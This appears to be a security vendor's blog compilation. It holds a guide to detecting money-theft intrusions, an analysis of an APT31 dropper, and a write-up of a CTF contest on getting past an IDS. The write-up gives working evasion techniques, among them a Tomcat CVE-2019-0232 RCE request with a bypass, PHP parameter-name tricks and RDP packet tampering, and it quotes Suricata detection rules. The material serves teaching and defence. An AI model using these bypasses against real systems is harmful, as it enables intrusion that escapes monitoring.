To gain more practical knowledge on how cybercriminals operate in actual life, every year for more than a decade now, we have held The Standoff, an attackers-vs-defenders cyberbattle set in a real-world environment. Only this way, under hyper-realistic conditions, is it possible to learn how infrastructure components can be attacked and how to protect them. The Standoff and PHDays threw their doors open to capture-the-flag (CTF) teams from many countries, including Russia, the U.S., Kazakhstan, India, Japan, and the UAE. Even the world’s top CTF teams, such as PPP, Carnegie Mellon University's competitive hacking team, have sharpened their skills in cyberexercises at The Standoff cyber-range.

Following our principle of open knowledge for the community, we made the event available to everyone. All-comers could watch videos of interesting talks, try their hand at detecting vulnerabilities or warding off a cyberattack, as well as freely monitor the cyberbattle traffic and take this expertise away with them so as to better protect their companies, develop efficient antihacker products, and create securer solutions and components.

Openness of information and knowledge, responsible disclosure, and a hands-on approach to cybersecurity are our key values. As such, we cannot but promise hot new infosec research, continued wide support for the community, and a host of new interesting conferences.

Thank you very much for your support, and see you all at PHDays 10!

Please also go check out our collection of best infosec findings in the past three years, and share it with your colleagues.

Denis Baranov,

Managing Director, Head of Research Department at Positive Technologies


How to detect a cyberattack and prevent money theft

$
0
0
Money theft is one of the most important risks for any organization, regardless of its scope of activity. According to our data, 42% of cyberattacks on companies are committed to obtain direct financial benefits. You can detect an attack at various stages — from network penetration to the moment when attackers start withdrawing money. In this article, we will show how to detect an attack at each of its stages and minimize the risk, as well as analyze two common scenarios of such attacks: money theft manually using remote control programs and using special malware — a banking trojan.


Where to look for signs of the attack

Penetration into the company's network


Phishing emails


Most often, attackers get into the local network by sending phishing emails with malicious attachments. According to our data, this is how 9 out of 10 APT groups start their attack. 

In most cases, a document of .doc, .docx, .xls, or .xlsx extensions with one of the payload types is used in phishing emails:

       VBA or Excel 4.0 macro

       Exploit for a vulnerability in a Microsoft Office component, such as CVE-2017-0199, CVE-2017-11882, CVE-2018-0802. 

Before running the document, you should first perform a static analysis, which can show whether the file is malicious. There are quite a lot of approaches to detection: using exact hash sums of the file (MD5, SHA1, SHA256) and using more flexible hash sums, such as SSDEEP. In the simplest case, you can find ASCII and Unicode strings in the file. But the most reliable will be the analysis of code fragments, during which you can identify the characteristic sequence of operations and encryption features.

However, static analysis does not always help detect suspicious files. A more reliable way is to run the file in a sandbox, where its behavior is analyzed. 

As a result of launching a malicious file, a subprocess is usually created in the context of an office application. Calls to create a new process in user space, such as CreateProcessA or CreateProcessW, are intercepted at the kernel level by calling NtCreateUserProcess or NtCreateProcessEx. But launching a process with a malicious payload can take place in other ways:

   Creating a task in the task scheduler. As a rule, the fact of creating a task can be detected with the help of several characteristic actions.


First, it is the creation of additional keys in the registry branch

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Schedule\TaskCache\Tree with the task properties. Second, it can be done with the help of the new task files in the directories C:\Windows\Tasks and C:\Windows\System32\Tasks. Third, it is the appearance of entries about the creation of a scheduled task in the event logs (events with the ID 4698). Moreover, you can not only create a task, but also change an existing one, in this case, the events in the log will have the ID 4702.


There is another technique: to track access to the COM interface 0F87369F-A4E5-4CFC-BD3E-73E6154572DD and interaction with it, because this is what schtasks.exe, the standard Windows utility for creating tasks in the console, does, for example. It is often used by attackers.


        Creating a service. The fact of creating a new service can be detected by the appearance of additional keys in the registry branches HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services and HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\ROOT\LEGACY_*. In the Windows event logs, the creation of the service will correspond to entries with the ID 4697 or 7045. In addition, you can track the RPC call to the interface 367ABB81-9844-35F1-AD32-98F038001003 of the RPC server \PIPE\svcctl.


        Autorun via the startup directory or registry. In the first case, this is a file entry in the %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup or %ProgramData%\Microsoft\Windows\Start Menu\Programs\Startup directories. The second one contains the registry keys HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run, HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon, and others (the identification of this technique is discussed in detail in the Persistence section).

New files in the system and the memory of the created processes also need to be scanned for malicious code.

Attack on the web application

Another common method of hacking is to exploit a vulnerability in a web application on the company's perimeter. The results of pentestingprojects conducted by our experts show that in 86% of companies there is at least one way to get into the internal network through a vulnerable web application.

It is necessary to track suspicious process launches using Windows security event log events with the ID 4688 or Sysmon log events with the ID 1. For example, running the cmd.exe command line, whose parent process is w3wp.exe (OWA service) will be suspicious. You should also monitor the creation of new processes on behalf of the user who started the process responsible for the operation of the attacked service. 

The successful exploitation of the vulnerability and uploading of the web shell can be indicated by the events of creating files with certain extensions, for example .asmx, .jsp, .php, and .aspx in the file directories of running services.

Network traffic analysis allows you to identify known techniques for exploiting vulnerabilities (for example, Path Traversal) or signs of using specific exploits. To detect the exploitation of unknown vulnerabilities, you need to monitor suspicious activity, for example, the presence of console utility launch strings or console utility data output patterns in the traffic. Such traffic may indicate the use of a web shell, which is often the next step after successfully exploiting a vulnerability. Another anomaly may be multiple requests containing incorrect data originating from a limited number of external addresses. 

Figure 1. String with the request to read the file /etc/passwd

Password spraying for available services

The third method is bruteforcing credentials to the services available on the perimeter. If an attacker tries to bruteforce passwords to one account, such an attack will quickly be noticed, and the account will be blocked. Therefore, criminals are more likely to resort to Password Spraying—an attack in which accounts are matched against one common password.

A password spraying attack can be detected by monitoring the event logs. To do this, you need to track the following events in the security event log:

    4625 "An account failed to log on" from hosts having services installed that are available on the network perimeter, such as OWA

    4771 "Kerberos pre-authentication failed" with the error code 0x6 "Client not found in Kerberos database" and 0x18 "Pre-authentication information was invalid"

    4776 "The computer attempted to validate the credentials for an account" in the case of NTLM authentication, with error codes C0000064 "Username does not exist" and C000006A "Username correct but password invalid"

For events 4625, it is possible to detect the address from which the password spraying attack is carried out, so the detection logic is based on searching for multiple triggers from the same IP address, but for different users. Events 4776 and 4771 appear on the domain controller and will have the addresses of the hosts where the services are located as the source address. In this case, you need to track multiple failed authentication attempts with different accounts over a certain period of time, such as 30 seconds.

Figure 2. Example of event 4771 with error code 0x18

For details on how to detect a password spraying attack in network traffic, see the full version of the research.

Persistence

When attackers are able to execute commands on the system, they need to gain persistence in order to have permanent access to the infrastructure. One of the most common ways to gain persistence on a host is to add a malicious executable file to the startup. 82% of APT-groups use this technique. Let's look at how to detect it using event logs and, in some cases, in network traffic.

In the Sysmon logs, you need to track the addition or modification of registry keys and their values using events 12 " RegistryEvent (Object create and delete)" and 13 " RegistryEvent (Value Set)" for certain registry branches associated with the startup function. 

Figure 3. Example of the Add Values event

Registry Branches

         HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run

         HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce

         HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run

         HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce

         HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserShell Folders 

         HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellFolders 

         HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellFolders 

         HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserShell Folders

         HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce

         HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce

         HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices

         HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices

         HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run

         HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run

         HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit

         HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell

         HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows


Additionally, it is recommended to track Sysmon events with the ID 11 "File Create" in the directory C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp and check files with the extension .lnk, .vbs, .js,. cmd,. com,. bat, or. exe.

The technique in question is not reflected in network traffic if the actions are performed locally on the host. However, it is possible to imagine a situation in which attackers perform manipulations remotely. For example, using WINREG (Windows Remote Registry Protocol) access to a remote registry, attackers add a value to the registry key HKCU\Software\Microsoft\Windows\CurrentVersion\Run. Also, if they have the appropriate access rights, they can copy the file over the SMB protocol. For example, when copying an executable file or a BAT file with command interpreter instructions to a folder C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp, the operating system will automatically launch such a file when any user logs in.

Collecting infrastructure data

The attackers need to understand where they are on the infrastructure, which hosts are of interest, and how to get to them. In our scenario, when the goal is money theft, the computers with access to financial systems will be points of interest for the attackers. Therefore, criminals conduct reconnaissance: they check which hosts are available, obtain the address of the domain controller and a list of administrators; find out what privileges they currently have, and in which groups the user on whose behalf they execute commands belongs to.

Search for system information

The application of the System Information Discovery technique can be detected using the security and PowerShell event logs in Windows, as well as using the Sysmon log. You need to detect the following events:

        Starting processes:

         net.exe or net1.exe with the config command,

         wmic.exe with the commands os, qfe,

         win32_quickfixengineering, win32_operatingsystem

         systeminfo.exe,

         ipconfig.exe,

         netstat.exe,

         arp.exe,

         reg.exe

          Reading the \Software\Microsoft\ Windows\CurrentVersion registry key

        Running PowerShell commands, including for WMI queries that allow obtaining information about the system

Analyzing access rights of user groups

A sign of using the Permission Groups Discovery technique on the local host is starting the process net.exe or net1.exe with the localgroup, group /domain, or group /dom commands. In the security event log, the process startup events have the ID 4688, and in Sysmon the ID 1.

It is possible to identify the technique in the network traffic by tracking the corresponding requests.  To obtain information about groups, you can use the network protocols LDAP, SAMR. In the case of LDAP, the searchRequest requests and their filter field are primarily interesting for detection. A request can be used to list all the groups:

Figure 4. Listing user groups

The memberof keyword is often used to list the members of a particular group. For example, the following figure lists the members of the domain administrators group.

Figure 5. Listing members of the domain administrators group


Attack development on the internal network

To connect to different infrastructure hosts (servers and workstations), you need to know user passwords or password hashes, or have a corresponding Kerberos ticket.

Kerberoasting attack

With the help of the Kerberoastingattack, an attacker can obtain the passwords of service accounts, which are often privileged. Any domain user can request a Kerberos ticket to access the service, and such a request will be considered legitimate. To encrypt the ticket, a hash of the service account password is used, and an attacker can try to decrypt it offline by bruteforcing the password. This technique is also widely applied in penetration testing: it is successfully used in 61% of projects.

In the event logs, you need to detect anomalies in TGS ticket requests (event 4769 "A Kerberos service ticket was requested"): analyze all accounts and IP addresses from which a request to the service was made and check whether an account usually requests a TGS ticket to the analyzed service from the same IP address.

You also need to check the encryption algorithm in the requests: use of the RC4 algorithm is one of the signs of a Kerberoasting attack.

In network traffic, you need to capture requests for listing services in Active Directory that can become targets for an attack. This stage is necessary for attackers to select a service to attack, and precedes the request for a TGS ticket and the bruteforcing of a password offline. You can list services, for example, using LDAP and the servicePrincipalName keyword in the filter field.

Figure 6. Listing services in Active Directory

 In this case, the enabled user accounts are requested.

SMB/Windows shared administrative resources

Shared administrative resources such as C$, ADMIN$, and IPC$ can be used by an attacker to remotely access the system. This technique is used both to transfer a file and to run a service on a remote computer. The method of detecting this technique using event logs and network traffic is contained in the full report (learn more).

Gaining control over the infrastructure

As a rule, a fraudulent operation does not require full control over the infrastructure. However, the maximum privileges allow attackers to move freely between computers, so it is likely that they will try to get the KRBTGT account. The privileges of this account allow them to create Kerberos tickets to access any resources with maximum privileges. Let's look at how to detect attempts to replicate credentials.

Detection using event logs

The DS-Replication-Get-Changes, DS-Replication-Get-Changes-All, and DS-Replication-Get-Changes-In-Filtered-Set privileges are required to replicate credentials from a domain controller.

In the security event log on domain controllers, in events with the ID 4662 "An operation was performed on an object", you need to track these privileges, and to detect the source of the attack, you need to match these events with the event 4624 "An account was successfully logged on," which will have the same login ID.

Detection using network traffic

When specifying the -just-dc-user key, the secretsdump utility uses the DCSync technique to obtain domain credentials. The attack consists in the fact that the host controlled by the attacker is represented by a domain controller and requests replication of the credentials of specific users.

Domain controllers use the Directory Replication Service (DRS) Remote Protocol for replication, or rather calls to the RPC interface that implements this protocol—DRSUAPI RPC interface. This interface has the DRSGetNCChangesmethod, which calls replication. If such calls come from a computer that is not a domain controller, then this is a clear sign of a DCSync attack.

Figure 7. DCSync attack traffic (Wireshark) 

Access to financial systems 

Having obtained the privileges of the KRBTGT account in the previous step, an attacker can generate a Kerberos ticket to access those computers that work with financial systems, for example, the computer of an accounting employee. Such an attack is called a Golden Ticket.

The next step of the attack after obtaining the KRBTGT account is to create a Kerberos ticket to connect to any domain resources with maximum privileges, or a Kerberos Golden Ticket attack. 

You need to look for anomalies in the DOMAIN ACCOUNT field in events with the following IDs:

        4624 "An account was successfully logged on"

        4634 "An account was logged off"

        4672 "Special privileges assigned to new logon"

Some utilities for the Golden Ticket attack may incorrectly enter values in this field: it may be empty or different from the domain name. You need to look at the type of encryption of the ticket: if RC4 is used, then this may be a sign of an attack. In addition, the Golden Ticket attack does not have any TGT ticket request events (Event ID 4769) from the user computer. 

In a legitimate Kerberos protocol scenario, the user must receive a TGT ticket during initial authentication. To do this, it sends an AS-REQ request to the domain controller, which returns the TGT in the body of the AS-REP response. The user can then request access to domain services. To authenticate to the service, you need a TGS ticket. To obtain it, the user sends a TGS-REQ request to the domain controller in which they put their TGT ticket. The server sends a TGS-REP response containing the requested TGS ticket.

Figure 8. Legitimate request order in the traffic 

Since the Golden Ticket attack involves creating a TGT ticket outside the domain controller, the AS-REQ/AS-REP steps will be omitted from the traffic, meaning a ticket that was not issued will be used. Therefore, the purpose of traffic analysis is to detect the use of tickets that were not issued by the domain controller.

The final stage — money theft

There are special banking Trojans that can automatically spoof payment details. In the last few years, the RTM Trojan has been widely used in attacks. In addition, an attacker can perform a fraudulent operation manually, keeping track of the workflow and actions of the company employees. For this purpose, they install malware for remote management on computers.

Use of remote management software 

Attackers can use various remote desktop access tools, including VNC technology: TightVNC, UltraVNC, RealVNC, and VNC Connect. The darknet sells modified versions of these programs that work unnoticed by the user. They allow attackers to spy on users, take screenshots, record videos, and intercept keyboard input. After collecting a sufficient amount of information, an attacker can connect to a computer and independently make a payment or spoof payment details.

The principle of operation of all products using VNC is very similar, so let's consider the behavior of TightVNC, since its source code is available. Let's look at how you can detect malicious activity for various remote control functions.


Use of banking trojans

Often, the purpose of banking trojans is to gain remote access to the e-banking or payment system. Therefore, common methods of stealing access are usually used, such as intercepting keystrokes, taking screenshots, writing data from the clipboard, or embedding it in browsers. But there are also specific techniques for this type of trojan.

Spoofing of bank details in the clipboard

The method consists in monitoring the clipboard for the presence of payment details and their spoofing using the attacker's details. The Buhtrap ClipBanker trojan checks the contents of the clipboard for the presence of electronic or cryptocurrency wallets, and if detected, spoofs them. The list of this malware includes more than 30 names of wallets. You can detect this behavior in the sandbox by copying the fake wallets of the most common payment systems to the clipboard, and then tracking the contents of the clipboard.

Spoofing of payment orders

In the CIS countries, the most widely used accounting system is 1C: Enterprise, which allows you to send payments to the bank using e-banking systems. The file 1c_to_kl.txt is used for transmitting payment data to the e-banking system. Attackers can make changes to this file to transfer money to their accounts, for example, this is how the RTM trojan works. The full research describes how to detect this malicious activity (read more). 

Modification of e-banking system files

This technique is used to bypass the self-protection of e-banking systems. An example is the BlueNorofftrojan, which modifies the modules of the SWIFT Alliance banking program in the memory to disable database verification and allow attackers to edit it. The trojan uses the VirtualProtectEx functions to allow writing to a code fragment, ReadProcessMemory to make sure that it changes the desired fragment, and WriteProcessMemory to overwrite the desired bytes.

You can detect the fact of modification of processes and files of e-banking systems. Calling VirtualProtectEx with the memory protection parameter PAGE_EXECUTE_READWRITE for e-banking processes is extremely suspicious, and, in combination with the call to WriteProcessMemory, it can serve as an indicator of changes in e-banking processes.

Theft of keys from payment systems and wallets

Some trojans steal private keys from payment systems and wallets: for example, Buhtrap ClipBanker steals keys from Electrum and Bitcoin wallets. It searches for these keys using the paths %appdata%\eLectrUm*\wAllEts\ and %appdata%\BiTcOin\wAllEts\walLet.dAt.

Figure 9. Code fragment of the Buhtrap ClipBanker trojan

You can detect this behavior by accessing these paths. Usually, the file search is performed using the FindFirstFile and FindNextFile functions. In addition, you can track attempts to open files using CreateFileA by checking the paths to the files. In the sandbox, you can place dummy files in the appropriate paths, and then monitor access to them.

In the course of their campaign, the attackers will have to use many techniques. In order to identify the attack as a whole, it is not necessary to identify all the techniques without exception, it is enough to notice any of its steps in time. However, the earlier the attacker actions are detected, the easier it is to prevent negative consequences.

You may find the whole text of the research here. Other Positive Technologies' studies are available in the Knowledge base on our website.

Author: Ekaterina Kilyusheva 


APT31 new dropper. Target destinations: Mongolia, Russia, the U.S., and elsewhere

$
0
0

Our pros at the PT Expert Security Center regularly spot emerging threats to information security and track the activity of hacker groups. During such monitoring in April 2021, a mailing list with previously unknown malicious content was sent to Mongolia. Similar attacks were subsequently identified in Russia, Belarus, Canada, and the United States. According to PT ESC threat intelligence analysts, from January to July 2021, approximately 10 attacks were carried out using the discovered malware samples.

Some of the files found during the study had rather interesting names ("хавсралт.scr" ["havsralt.scr"] (mong. attachment), "Информация_Рб_июнь_2021_года_2021062826109.exe") and, as the study showed, they contained a remote access trojan (RAT). A detailed analysis of malware samples, data on the paths on which working directories and registry keys were located, techniques and mechanisms used by the attackers (from the injection of malicious code to the logical blocks and structures used) helped correlate this malware with the activity of the APT31 group.

In this article, we will study the malware created by the group, focus in more detail on the types of droppers discovered and the tricks used by its developers.  You may find the whole text of the research and indicators of compromise that can be used by cybersecurity specialists to identify traces of the group's attacks and search for threats in their infrastructure here.


Dropper

The main objective of the dropper, the appearance of the main function of which is shown in Figure 1, is the creation of two files on the infected computer: a malicious library and an application vulnerable to DLL Sideloading (this application is then launched). Both files are always created over the same path: C:\ProgramData\Apacha. In the absence of this directory, it is created and the process is restarted.

Figure 1. Overview of the dropper's basic function


At the second stage, the application launched by the dropper loads the malicious library and calls one of its functions. It is noteworthy that MSVCR100.dll was chosen as the name of the malicious library in all cases. A library with an identical name is included in Visual C ++ for Microsoft Visual Studio. It is available on almost all PCs, but in a legitimate case it is located in the System32 folder (Figure 2). Moreover, the size of the malicious library is much smaller than the legitimate one.


Figure 2. Parameters of the legitimate MSVCR100.dll


It is also worth noting the trick of the malware developers: by way of exports, the library contains names that can be found in the legitimate MSVCR100.dll. Without a doubt, this was done to make the malicious library as identical to the original version as possible.

Figure 3. Part of the exports of malicious MSVCR100.dll

However, the number of exports in the malicious sample is much smaller, and most of them are ExitProcess calls.

Below is an example of a call to a malicious function from the created library. After the call, control is transferred to the malicious code. Note that the names of malicious functions were most often those used during the regular loading of applications.

Figure 4. Calling a malicious function inside a legitimate application

During the analysis of malware samples, we detected different versions of droppers that contain the same set of functions. The main difference is the name of the directory in which the files contained in the dropper will be created. However, in all the instances studied, the directories found in C:\ProgramData\ were used.

The version of the dropper that downloads all files from the control server is worthy of particular note. Let's take a closer look. At the first stage, the presence of a working directory is also checked, after which connection is made to the control server and the necessary data is downloaded from it.

Figure 5. Checking for a directory

Communication with the server is not encrypted in any way, nor is the control server's address inside the malware. Downloaded files are written to the created working directory.

Figure 6. Creating files in the working directory

Figure 7 displays the code sections responsible for downloading all files from the server (the last reviewed case), while Figure 8 displays the code for loading the main library (first instance).

Figure 7. Downloading files from C2

 

Figure 8. Downloading a malicious library from C2

Examining the open directories of control servers revealed unencrypted libraries (Figure 9).

Figure 9. Encrypted and unencrypted libraries on the server

It is also worth noting that in some cases, particularly during attacks on Mongolia, the dropper was signed with a valid digital signature (Figure 10). We believe that this signature was most likely stolen.

Figure 10. Valid digital signature of a dropper


Malicious library

Execution commences with receipt of a list of launched processes. That said, this has no impact on anything and is not used anywhere. The library then checks for the presence of the file C:\\ProgramData\\Apacha\\ssvagent.dll. This is the encrypted main load downloaded from the server.

In fact, this is a 5-byte XOR with a key built into the library. Inside the binary file, the key is stored in the form xmmword with the constant 9000000090000000900000009h (the fifth byte is added to the memory by the malware itself using the direct address). In fact, encryption is performed with byte 0x9. After decrypting the C2 address, it connects to the control server and downloads the encrypted payload from it. Then the received data is saved in the file C:\\ProgramData\\Apacha\\ssvagent.dll, and the legitimate application ssvagent.exe is restarted. The main part of the described functions is presented in Figure 11.

Figure 11. Decrypting the C2 address, loading and launching a new instance of ssvagent.exe

If the payload has been loaded earlier, it is checked for an application that is already running. To do this, a mutex named ssvagent is created; if it has been created, the application ends.

The library then writes the legitimate ssvagent.exe to startup via the registry, as shown in Figure 12.

Figure 12. Persistence via registry key


After this, the file downloaded from the server is decrypted using a XOR operation with a 5-byte key. Then the decrypted data is placed in the application memory, and control is transferred to it.

Payload

The main library starts its execution by creating a package that will be sent to the server. Officially, the package is created from three parts:

  1. main heading
  2. hash
  3. encrypted data

The research describes their structures (learn more).

To generate a hash, which is preceded by the main heading, the malware obtains the MAC address and PC name (the result of executing GetComputerNameExW). These values are concatenated (without using any separators), after which an MD5 hash is taken from the resulting value, which is then converted into a string. An example of hash generation is presented in Figure 13.

Figure 13. Example of hash generation

The third part of the package is then formed.

Figure 14. An example of a generated package

The format of a complete generated package is presented below. The main heading is highlighted in green; the hash, in red; the encrypted data, in yellow.

Figure 15. Encrypted package with all headings

Figure 16. Decrypting data from a specific position within a binary file

The generated package is encrypted with RC-4 with the key 0x16CCA81F, which is embedded in the encrypted data and sent to the server. After this, malware waits for commands from the server.

Let's take a look at the list of commands that the malware implements:

0x3: get information on mapped drives.

0x4: perform file search.

0x5: create a process, communication through the pipe.

0xA: create a process via ShellExecute.

0xC: create a new stream with a file download from the server.

0x6, 0x7, 0x8, 0x9 (identical): search for a file or perform the necessary operation via SHFileOperationW (copy file, move file, rename file, delete file).

0xB: create a directory.

0xD: create a new stream, sending the file to the server.

0x11: self-delete.

The code for processing the last command is particularly intriguing: all the created files and registry keys are deleted using a bat-file.

Figure 17. Code for removing all components

A more detailed description of the payload is available in the full report.

Attribution

During our study, we found a Secureworks report describing the APT31 DropboxAES RAT trojan. Analysis of the detected malware instances allows us to assert that the group is also behind the attack we studied. The criteria on the basis of which the attacks were attributed are detailed in the report (read more).

Conclusion

We analyzed new versions of the malware used by APT31 in attacks from January to July this year. The revealed similarities with earlier versions of malicious samples described by researchers, such as in 2020, suggest that the group is expanding the geography of its interests to countries where its growing activity can be detected, Russia in particular. We believe that further instances will be revealed soon of this group being used in attacks, including against Russia, along with other tools that might be identified by code correspondence or network infrastructure.

Follow the link to read the full report and get indicators of compromise. You can see more PT ESC reports on current cyber threats, new malware samples, activity of APT groups, hacker techniques and tools in the blog on our website.

Authors: Denis Kuvshinov, Daniil Koloskov, PT ESC Threat Intelligence, Positive Technologies 

 

PHDays 10 IDS Bypass contest: writeup and solutions

$
0
0

For the second time, the IDS Bypass contest was held at the Positive Hack Days conference. Just like last time (see blog.ptsecurity.com/2019/07/ids-bypass-contest-at-phdays-writeup.html), the players were supposed not only to find flaws in the six services and capture the flags, but also bypass the IDS, which would interfere with them. Alert messages about the facts of triggering IDS rules were supposed to help in bypassing them. And as you know from the last competition, there can be infinitely many solutions to tasks. Here we go.


192.168.30.10—Apache Tomcat

On port 8080, we can see Apache Tomcat version 9.0.17. The first search for an exploit for this version should lead to CVE-2019-0232.

This task was intended as an introductory one and was supposed to be the simplest (although some of the other tasks turned out to be simpler). In the exploit, we see a test URL with the command /cgi/test.bat?&dir. But with such a request, it just freezes, and the player sees the IDS alert:

ATTACK [PTsecurity] Apache Tomcat RCE on Windows (CVE-2019-0232)

It was intended so that the players would modify the URL in the same way as they would do it to bypass the WAF. The regular expression in the rule looks like this: pcre: "/\.(?:bat|cmd)\?\&/U"; and soon the IDS would submit to the player. In addition, some exploits already have an example of a URL with a bypass, for example: http://localhost:8080/cgi/test.bat%20%20?&dir. As a result, many easily completed the task. We have taken a look at the contest, let's move on.


192.168.30.20—PHP Bypass

On the main page, we can see an offer to test the ls command. It warns us that it may not be working.

And, as expected—it is not working. There is a message in the log:

ATTACK [PTsecurity] file_name parameter possible command injection

You might think that in the task you have to exploit RCE and get the flag, but the idea was different. In the summer of 2019, an author under the pseudonym "@Menin_TheMiddle" published an article (secjuice.com/abusing-php-query-string-parser-bypass-ids-ips-waf) about the IDS and WAF bypass. It said that a number of characters in the name of the GET parameter the PHP interpreter leads to an underscore ("_"). Our IDS, unlike PHP, does not do this. For example, the author used one of the public IDS rules of our AttackDetection team. And since the crucial part of the Suricata rule looked like this: pcre: "/file_name\s*=\s*[a-zA-Z\.]*[^a-zA-Z\.]/U";it was possible to bypass it simply by replacing the file_name parameter with, say, file[name. Due to an error in the Suricata rule, you could get the flag simply by sending file_name=.


192.168.30.30—He said yes

We see a form and instructions on how to get that flag. It is enough to give a simple answer "yes" to the HTTP request.


The players started a web server on their nodes, answered "yes" to incoming requests and saw the following line in the logs:

JOKE [PTsecurity] Sometimes Positive Technologies hurts! No 'yes' allowed

The rule checked all HTTP responses and did not allow those with the "yes" string inside. The game host also accepted the "yes" string in lowercase only, and this task received the largest number of different solutions!

The idea was to redirect the incoming HTTP request to the HTTPS protocol and answer "yes" in the new request. For this vector, the allow_redirects=True and verify=False parameters were specially used in the requests library. The solution looked like this:

echo -ne "HTTP/1.1 302 Redirect\r\nLocation: https://10.8.0.2/hi_there\r\nContent-Length: 0\r\n\r\n" | sudo nc -nkvlp 80

echo -ne "HTTP/1.1 200 OK\r\nContent-Length: 3\r\nContent-Type: text/html\r\n\r\nyes" | sudo ncat -nvklp 443 –ssl

The player @vos used a hundredfold nested gzip compression for the HTTP response, and the player @webr0ck used zero filling of almost 2 megabytes in size before the "yes" string. In both cases, Suricata turned out to be powerless. 

192.168.30.40—DCERPC

It was the most expensive task in the competition. The players were given the administrator account credentials and asked to show their knowledge of Windows protocols. To get the flag, it was necessary to extract the list of all the users on the device.


Those who are familiar with AD security can immediately think of the samrdump.py script from the impacket set, but the script addresses SMB port 445 that is closed on the host. The binding string in the script ncacn_np:*hostname*[\pipe\samr]is fixed and leads to the SMB pipe. In addition, of all open ports on the host, only port 135 is detected, the so-called Endpoint Mapper listens to it. EPM is responsible for resolving RPC interfaces.

Another script from the impacket set, rpcdump.py, uses EPM to obtain the list of currently active RPC interfaces.

> python rpcdump.py Administrator:TastesG00d@192.168.30.40

Protocol: [MS-SAMR]: Security Account Manager (SAM) Remote Protocol

Provider: samsrv.dll

UUID    : 12345778-1234-ABCD-EF00-0123456789AC v1.0

Bindings:

          ncacn_ip_tcp:192.168.30.40[49668]

          ncacn_np:\\TASK4[\pipe\lsass]

Among all the interfaces, we can see the one we need, SAMR, which is responsible, among other things, for user management. Using the SAM interface, the samrdump.py script extracts the list of users. That is, in addition to the SMB pipe, we can directly connect to port 49668 and request the list of users via the DCERPC protocol. To do this, we need to patch the samrdump.py script so that it directly addresses the SAMR interface instead of the pipe. The players @vos and @Abr1k0s opted for a different solution. They used a ready-made walksam tool from the rpctools set, the only difficulty of which is using the flag RPC_C_AUTHN_LEVEL_PKT_PRIVACY instead of RPC_C_AUTHN_LEVEL_CALL. Alternative methods were to use atsvc, svcctl, dcom, and other interfaces. All of them allow arbitrary code execution and are closed by IDS rules. The shutdown interface was also closed. The most unusual way to solve this task involved remote search for user creation events using wevtutil: 


192.168.30.50—RDP me

The task is simple: to connect via RDP with a known account and read the flag from the desktop. The difficult part is that most of the known RDP clients are blocked by IDS rules. The players received one of the following messages every now and then:

  • TOOLS [PTsecurity] xfreerdp/vinagre/remmina RDP client
  • TOOLS [PTsecurity] xfreerdp/remmina RDP client
  • TOOLS [PTsecurity] MSTSC Win10 RDP client
  • TOOLS [PTsecurity] MSTSC Win7 RDP client
  • TOOLS [PTsecurity] Rdesktop RDP client

Sometimes different RDP clients behave the same way: for example, many Linux clients are built around the same library. The task has several solutions.

The first one, which was originally envisaged, is a head-on solution. The player goes through different launch options or tries different clients and sees different IDS alerts. After traffic analysis, it becomes clear which packet is blocked by the IDS. Based on this, the player can draw a conclusion about how the rules work. The rules are triggered on certain channel sequences (channelDef) in the ClientNetworkData field and on the header order itself. 


Going through the launch options of the xfreerdp client of the latest versions, the player may come across the echo option:

  • xfreerdp /v:192.168.30.50 /u:user /p:letmein +echo
  • And xfreerdp with exactly these parameters will slip past the IDS rules. 

Another way was demonstrated by @vos, @Abr1k0s, and @astalavista—they connected to the server using the Mocha RDP Lite mobile client. A fundamentally different solution using netsed was found by @webr0ck. Netsed, like a regular sed, is able to replace network data on the fly. The player simply zero-filled all the channel names in the ClientData RDP package.


192.168.30.60—LDAP

The description contains an IP address with open port 389. There are no credentials in the task, but the LDAP service supports anonymous connections (bind). However, with a simple connection using the Python library ldap3, we see the IDS alert in three lines.

server = ldap3.Server('192.168.30.60', port=389)

connection = ldap3.Connection(server)

connection.bind()

TEST [PTsecurity] LDAP ASN1 single byte length fields prohibited

We captured the dump of our traffic and we see that the bind itself is successful, but the searchRequest that the library sent after that remains unanswered. The IDS rule is triggered on it.

The Windows utilities ADSIEdit and ldp, as well as the Linux utility ldapsearch, give similar results, but with different alerts:

TEST [PTsecurity] LDAP ASN1 1-byte length encoded found

TEST [PTsecurity] LDAP ASN1 2-byte length encoded found

TEST [PTsecurity] LDAP ASN1 4-byte length encoded found

The whole point turns out to be how the lengths of individual fields in LDAP messages are encoded. The byte x in the byte sequence 30 8x yy yy yy is responsible for the length of the length field in bytes. For example, the sequence 30 82 00 02 encodes two bytes of the length field 00 02. Thus, the players were required to try fields of a different length and find that the IDS is not triggered on the field of 3 bytes long. The flag is in the response among the namingContexts fields. The task implied the only solution, and only two of the players managed to do the task.



Results:

